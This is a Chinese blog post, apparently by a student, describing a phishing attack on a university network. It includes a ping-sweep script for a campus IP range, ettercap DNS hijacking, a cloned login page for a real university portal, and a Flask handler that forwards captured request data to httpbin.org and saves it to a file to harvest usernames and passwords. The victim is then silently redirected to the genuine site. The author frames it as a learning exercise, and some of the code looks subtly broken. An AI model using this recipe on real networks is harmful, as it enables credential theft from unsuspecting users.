Hello ! 我是"我是小恒不会java"
本文仅作为针对普通同学眼中的网络安全,设计的钓鱼案例也是怎么简陋怎么来
注:本文不会外传代码,后端已停止使用,仅作为学习使用
内网主机扫描+DNS劫持+前端模拟+后端HTTP请求保存日志+前端重定向至真实网站
原本站点网址,这是作者仿制后实现的,后端Flask框架(打码了)
https://ca.csu.edu.cn/
- import os
- import platform
-
- def ping(host):
- if platform.system() == "Windows":
- response = os.system("ping -n 1 " + host)
- else:
- response = os.system("ping -c 1 " + host)
- return response == 0
-
- with open("active_ips.txt", "w") as f:
- for i in range(0, 255):
- for j in range(0, 255):
- ip = "100.65.{}.{}".format(i, j)
- if ping(ip):
- print("{} is active".format(ip))
- f.write(ip + "\n")
python太慢,建议用批处理脚本。第一次写,没必要,就先用了
准备:一台kail linux主机,连接校园网,使用ettercap进行DNS劫持
修改/etc/ettercap/etter.dns文件,根据提示按需进行劫持配置
先打开阿帕奇服务器,试试可用性,成功则如下图所示
主要是针对移动端,我就只针对移动端进行特意修改
加上form表单,和falsk后端匹配。设置应用的秘钥,用于加密session数据。
实现一个简单的session登陆验证,并向后端发送加密信息,等待服务器响应
- def save_request_data():
- target_url = request.json['target_url']
- save_path = request.json['save_path']
-
- # 准备请求参数
- request_data = {
- 'method': 'POST',
- 'url': target_url,
- 'headers': request.headers.to_list(), # 保存当前请求的 headers 为例
- 'data': request.get_json()
- }
-
- # 发送请求到 httpbin(一个用于测试 HTTP 请求和响应的工具服务),以获取原始请求数据
- response = requests.post('https://httpbin.org/anything', json=request_data)
-
- if response.status_code == 200:
- # 解析 httpbin 返回的 JSON 数据,提取原始请求数据
- raw_request_data = response.json()['req']
-
- # 将原始请求数据写入文件
- with open(save_path, 'w', encoding='utf-8') as f:
- json.dump(raw_request_data, f, ensure_ascii=False, indent=4)
-
- return jsonify({'status': 'success', 'message': 'HTTP request data saved successfully.'})
- else:
- return jsonify({'status': 'error', 'message': f'Received non-successful status code {response.status_code} from the server.'}), response.status_code
服务器端保存请求内容,并正常返回响应,从而达到获取username和password的目的
在前端点击登陆后重定向至正确网址,用户只会认为网页卡顿了,再次输入信息后成功登陆校园门户网络